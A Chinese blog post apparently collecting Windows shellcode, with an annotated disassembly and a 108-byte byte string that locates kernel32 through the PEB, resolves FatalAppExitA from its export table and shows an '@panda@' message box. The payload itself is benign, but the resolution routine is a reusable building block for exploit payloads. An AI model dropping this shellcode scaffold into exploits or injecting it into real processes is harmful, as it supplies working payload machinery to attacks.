• shellcode搜集


    好像 Windows 各版本都能用：利用 FatalAppExit 函数弹出对话框然后结束，shellcode 串很短。

    ; Analyst notes on this debugger dump (32-bit x86, Intel syntax):
    ; - The byte string further down starts with x31xD2 (xor edx,edx); that
    ;   instruction precedes the first line shown here and is not in the dump.
    ; - From 00406096 onward the address column no longer matches the byte
    ;   count (0040608C + 5 bytes = 00406091); the byte string has no gap.
    ; Register roles: eax = module base located by the first loop; edx = export
    ; directory; edi = current table pointer, finally the resolved address;
    ; ebp = name index / ordinal; esi = current name pointer.
    00406032    B2 30           mov dl,0x30
    00406034    64:8B12         mov edx,dword ptr fs:[edx]                 ; fs:[0x30]
    00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; _PEB_LDR_DATA
    0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList, first entry
    0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; author's label: InMemoryOrderLinks; the value is used below as the image base (see [eax+0x3C])
    00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; FullDllName
    00406043    8B12            mov edx,dword ptr ds:[edx]                 ; InInitializationOrderModuleList, next entry
    00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33             ; 0x33 = '3' at byte 0xC of the name; presumably "kernel32.dll" as UTF-16 -- verify
    00406049  ^ 75 F2           jnz XlastTest.0040603D                     ; no match: continue with the next entry
    0040604B    89C7            mov edi,eax
    0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; PE header (base + e_lfanew)
    00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; export directory RVA
    00406053    01C2            add edx,eax                                ; RVA -> VA
    00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; ENT (AddressOfNames)
    00406058    01C7            add edi,eax
    0040605A    31ED            xor ebp,ebp                                ; ebp = name index, starts at 0
    0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]           ; esi = names[ebp] (RVA)
    0040605F    01C6            add esi,eax
    00406061    45              inc ebp                                    ; incremented before the compare: on a match ebp = index + 1
    00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; CMP NAME 0-3 ("Fata")
    00406068  ^ 75 F2           jnz XlastTest.0040605C
    0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; 8-11 ("Exit"); only bytes 0-3 and 8-11 of the name are compared
    00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; FatalAppExit displays a message box and terminates the application when the box is closed
    00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; export ordinal table (AddressOfNameOrdinals)
    00406076    01C7            add edi,eax
    00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; get the ordinal; NOTE(review): ebp is index+1 here, so this reads the entry after the matched name -- the -0x4 below appears to compensate, which relies on neighbouring ordinals being consecutive; verify
    0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; EAT (AddressOfFunctions)
    0040607F    01C7            add edi,eax
    00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; get the function RVA
    00406085    01C7            add edi,eax                                ; get the address of FatalAppExitA
    00406087    68 64614001     push 0x1406164                             ; bytes 64 61 40 01 = "da@" followed by 0x01
    0040608C    68 4070616E     push 0x6E617040                            ; bytes 40 70 61 6E = "@pan"; stack now holds "@panda@" + 0x01
    00406096    89E1            mov ecx,esp                                ; ecx = message text (address column is off by 5 from here on)
    00406098    FE49 07         dec byte ptr ds:[ecx+0x7]                  ; 0x01 -> 0x00, NUL-terminating the pushed string
    0040609B    31C0            xor eax,eax                                ; uAction = 0
    0040609D    51              push ecx                                   ; lpMessageText
    0040609E    50              push eax                                   ; uAction
    0040609F    FFD7            call edi                                   ; FatalAppExitA(0, "@panda@")

    "x31xD2xB2x30x64x8Bx12x8Bx52x0Cx8Bx52x1Cx8Bx42x08x8Bx72x20x8B"
    "x12x80x7Ex0Cx33x75xF2x89xC7x03x78x3Cx8Bx57x78x01xC2x8Bx7Ax20"
    "x01xC7x31xEDx8Bx34xAFx01xC6x45x81x3Ex46x61x74x61x75xF2x81x7E"
    "x08x45x78x69x74x75xE9x8Bx7Ax24x01xC7x66x8Bx2Cx6Fx8Bx7Ax1Cx01"
    "xC7x8Bx7CxAFxFCx01xC7x68x64x61x40x01x68x40x70x61x6Ex89xE1xFE"
    "x49x07x31xC0x51x50xFFxD7"
    //108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3














  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982379.html